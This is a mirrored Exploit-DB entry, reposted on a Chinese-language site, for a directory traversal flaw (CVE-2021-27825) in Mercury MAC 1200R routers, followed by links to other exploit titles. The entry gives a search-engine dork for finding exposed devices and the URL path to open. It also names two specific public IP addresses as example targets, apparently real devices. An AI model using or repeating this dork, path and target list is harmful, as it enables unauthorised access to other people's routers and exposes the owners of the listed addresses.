MAC 1200R – Directory Traversal

Exploit Database
15 阅读

作者： Chunlei Shang, Jiangsu Public Information Co., Ltd.

日期： 2023-04-07
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51315/

# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825

1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888". 
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1）http://60.251.151.2:8888/web-static/

2）http://222.215.15.70:8888/web-static/

last Exploits
MAC 1200R – Directory Traversal的更多信息

Vanilla Forums Van2Shout Plugin 1.0.51 – Multiple Cross-Site Request Forgery Vulnerabilities：
Ballettin Forum – SQL Injection：
ICClassifieds 1.1 – SQL Injection：
IPFire 2.21 – Cross-Site Scripting：
Zoom Telephonics ADSL Modem/Router – Multiple Vulnerabilities：
SyntaxCMS – ‘rows_per_page’ SQL Injection：
Oracle Secure Backup – Authentication Bypass/Command Injection (Metasploit)：
AmazCart CMS 3.4 – Cross-Site-Scripting (XSS)：